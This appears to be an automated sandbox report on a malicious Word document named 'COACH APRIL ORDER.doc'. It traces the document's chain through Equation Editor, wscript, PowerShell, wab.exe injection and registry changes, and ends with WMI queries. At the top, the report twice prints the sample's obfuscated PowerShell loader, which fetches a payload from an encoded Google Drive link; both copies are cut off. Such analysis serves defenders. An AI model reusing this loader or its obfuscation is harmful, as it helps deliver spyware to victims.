Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf			Jump to behavior

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 770B0000 page execute and read and write

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 22_2_07DE0464 NtResumeThread,

22_2_07DE0464

Detected potential crypto function

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0062A50F	2_2_0062A50F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00629816	2_2_00629816
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_002E8718	7_2_002E8718
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_002E8FE8	7_2_002E8FE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_002E83D0	7_2_002E83D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_20214960	15_2_20214960
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_20213940	15_2_20213940
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_20219250	15_2_20219250
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_20213C88	15_2_20213C88
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_2021C4D0	15_2_2021C4D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_20350040	15_2_20350040
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_20356D98	15_2_20356D98
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_203589DD	15_2_203589DD
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_20355E29	15_2_20355E29
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_20358FC8	15_2_20358FC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_20357630	15_2_20357630
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_20352270	15_2_20352270
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_20359738	15_2_20359738
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_2021C880	15_2_2021C880
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_001C7AF8	22_2_001C7AF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_001C83C8	22_2_001C83C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_001C77B0	22_2_001C77B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_07DE0601	22_2_07DE0601
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_07DDFE2D	22_2_07DDFE2D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_07DE0905	22_2_07DE0905
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 30_2_1FC2959F	30_2_1FC2959F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 30_2_1FC23940	30_2_1FC23940
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 30_2_1FC24958	30_2_1FC24958
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 30_2_1FC24088	30_2_1FC24088
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 30_2_1FC2C84B	30_2_1FC2C84B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 30_2_1FC66231	30_2_1FC66231
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 30_2_1FC671A0	30_2_1FC671A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 30_2_1FC60040	30_2_1FC60040
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 30_2_1FC693D0	30_2_1FC693D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 30_2_1FC62678	30_2_1FC62678
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 34_2_049E4088	34_2_049E4088
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 34_2_049E4958	34_2_049E4958
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 34_2_049E3940	34_2_049E3940
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 34_2_049E92C3	34_2_049E92C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 34_2_049ED090	34_2_049ED090
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 34_2_20060040	34_2_20060040
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 34_2_20067198	34_2_20067198
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 34_2_20066231	34_2_20066231
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 34_2_20062270	34_2_20062270
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 34_2_200693C8	34_2_200693C8

Uses reg.exe to modify the Windows registry

Source: C:\Windows\SysWOW64\cmd.exe

Yara signature match

Source: COACH APRIL ORDER.doc, type: SAMPLE	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: Process Memory Space: powershell.exe PID: 3548, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3752, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@36/36@77/7

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$ACH APRIL ORDER.doc

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR6585.tmp

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magicremoihohj75.vbs"

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......8I.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......DI.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......VI.........................s....................~.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......bI.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.<.......tI.........................s............H....... .......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<........I.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<........I.........................s....................Z.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<........I.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<........I.........................s....................Z.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<........I.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<........I.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<........I.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<........I.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<........I.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....................<........J.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<........J.........................s............H...............................
Source: C:\Windows\SysWOW64\reg.exe	Console Write: ......................2.........T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".....................................(.P........................................................s..............".............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............../...............".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".....................................(.P........................................................s..............".....~.......X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............../...............".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1....................................s............../..... .......X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............../.............X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".....................................(.P........................................................s..............".....Z.......X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............../...............".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".....................................(.P........................................................s..............".....Z.......X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................&..........................s............../...............".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".....................................(.P.............................8..........................s..............".............X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................E..........................s............../...............".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".....................................(.P.............................W..........................s..............".............X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................c..........................s............../...............".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.............................u..........................s............../.............X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............../.............X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................~.......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1....................................s.................... .......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................Z.......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................Z.......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P............................."..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................4..........................s............................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................@..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................R..........................s............................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................^..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.............................p..........................s............................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................\|..........................s............................(...............

Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Command line argument: WABOpen		24_2_005A1EF4
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Command line argument: WABOpen		31_2_005B1EF4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3548
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3752
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3464
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1948
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
